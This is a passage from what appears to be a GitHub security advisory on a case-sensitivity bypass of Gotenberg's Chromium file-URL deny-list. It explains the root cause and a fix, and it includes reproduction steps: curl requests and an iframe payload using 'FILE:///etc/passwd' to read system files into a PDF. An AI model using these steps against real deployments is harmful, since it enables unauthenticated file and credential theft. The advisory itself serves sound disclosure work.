+ "details": "### Impact\n\nThe fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.\n\nThe default `--chromium-deny-list` value is `^file:(?!//\\/tmp/).*`. This regex is anchored to lowercase `file:` at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like `FILE:///etc/passwd` or `File:///etc/passwd` bypasses the deny-list check but still gets resolved by Chromium as `file:///etc/passwd`.\n\nThe root cause is in `pkg/gotenberg/filter.go` — the `FilterDeadline` function compiles the deny-list regex with `regexp2.MustCompile(denied.String(), 0)`, where `0` means no flags (case-sensitive). Since the regex pattern itself doesn't include a `(?i)` flag, matching is strictly case-sensitive.\n\nThis affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).\n\n### Steps to Reproduce\n\n1. Start Gotenberg with default settings:\n\n```bash\ndocker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg\n```\n\n2. Read `/etc/passwd` via the URL endpoint using an uppercase scheme:\n\n```bash\ncurl -X POST 'http://localhost:3000/forms/chromium/convert/url' \\\n --form 'url=FILE:///etc/passwd' -o output.pdf\n```\n\n3. Open `output.pdf` — it contains the contents of `/etc/passwd`.\n\n4. Alternatively, create an `index.html`:\n\n```html\n<iframe src=\"FILE:///etc/passwd\" width=\"100%\" height=\"100%\"></iframe>\n```\n\nThen convert it:\n\n```bash\ncurl -X POST 'http://localhost:3000/forms/chromium/convert/html' \\\n -F 'files=@index.html' -o output.pdf\n```\n\n5. The resulting PDF contains `/etc/passwd` contents.\n\nMixed-case variants like `File:`, `fILE:`, `fiLE:` etc. all work as well.\n\n### Root Cause\n\n- `pkg/modules/chromium/chromium.go` defines the default deny-list as `^file:(?!//\\/tmp/).*`\n- `pkg/gotenberg/filter.go` compiles this with `regexp2.MustCompile(denied.String(), 0)` — flag `0` means case-sensitive\n- `pkg/modules/chromium/events.go` uses `FilterDeadline` to check intercepted request URLs against the deny-list\n- Chromium normalizes URL schemes to lowercase, so `FILE:///etc/passwd` becomes `file:///etc/passwd` after the deny-list check has already passed\n\n### Suggested Fix\n\nChange the default deny-list regex to use a case-insensitive flag:\n\n```\n(?i)^file:(?!//\\/tmp/).*\n```\n\nOr apply case-insensitive matching in `FilterDeadline` when compiling the regex.\n\n### Severity\n\nThis is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments